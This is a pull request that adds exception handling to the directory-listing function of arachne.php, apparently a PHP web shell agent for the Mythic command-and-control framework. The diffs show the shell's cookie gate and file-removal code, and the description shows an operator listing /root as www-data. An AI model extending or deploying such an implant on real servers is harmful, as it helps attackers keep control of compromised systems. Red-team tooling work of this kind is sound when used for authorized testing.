### PR TITLE
Exception handling for list_directory function in arachne.php

### DIFF
--- a/Payload_Type/arachne/arachne/agent_code/arachne.php
+++ b/Payload_Type/arachne/arachne/agent_code/arachne.php
@@ -73,6 +73,33 @@ function list_directory($path){
 	  }
 	return $output;
 }
+function list_directory($path){
+    // check if directory exists and is readable
+    if (!is_dir($path) || !is_readable($path)) {
+        return "Error: Directory '$path' does not exist or is not readable.";
+    }
+    
+    try {
+        $files = scandir($path);
+        $output = "Listing contents of: " . realpath($path) . "\n";
+        $output .= "\tUID\tGID\tSize\tMTime\tName\n";
+        
+        foreach ($files as $item) {
+            $fullPath = $path . "/" . $item;
+            // check if each file is readable
+            if (is_readable($fullPath)) {
+                $curFile = stat($fullPath);
+                $curOutput = $curFile["uid"] . "\t" . $curFile["gid"] . "\t" . $curFile["size"] . "Bytes \t" . date("Y-m-d\TH:i:s\Z", $curFile["mtime"]) . "\t" . $item;
+                $output .= "\n" . $curOutput;
+            } else {
+                $output .= "\nPermission denied: $item";
+            }
+        }
+        return $output;
+    } catch (Exception $e) {
+        return "Error: " . $e->getMessage();
+    }
+}
 function remove_file($path){
 	if( unlink($path) ){
 		return "Removed file";

--- a/Payload_Type/arachne/arachne/agent_code/arachne.php
+++ b/Payload_Type/arachne/arachne/agent_code/arachne.php
@@ -63,17 +63,6 @@ if($_COOKIE["%COOKIE%"] != base64_encode($cookie_value)){
 	abort_call();
 }
 function list_directory($path){
-	$files = scandir($path);
-	$output = "Listing contents of: " . realpath($path) . "\n";
-	$output = $output . "\tUID\tGID\tSize\tMTime\tName\n";
-	foreach ($files as $item) {
-		$curFile = stat($path . "/" . $item);
-		$curOutput = $curFile["uid"] . "\t" . $curFile["gid"] . "\t" . $curFile["size"] . "Bytes \t" . date("Y-m-d\TH:i:s\Z", $curFile["mtime"]) . "\t" . $item;
-		$output = $output . "\n" . $curOutput;
-	  }
-	return $output;
-}
-function list_directory($path){
     // check if directory exists and is readable
     if (!is_dir($path) || !is_readable($path)) {
         return "Error: Directory '$path' does not exist or is not readable.";


### PR DESCRIPTION
This PR aims to provide exception handling so that if the `ls` command is tasked in Mythic to a PHP arachne callback and there is an exception, the callback does not hang.

Example error message when attempting to `ls` the root directory as `www-data`.
```
(operator) > ls /root
Error: Directory '/root' does not exist or is not readable.
```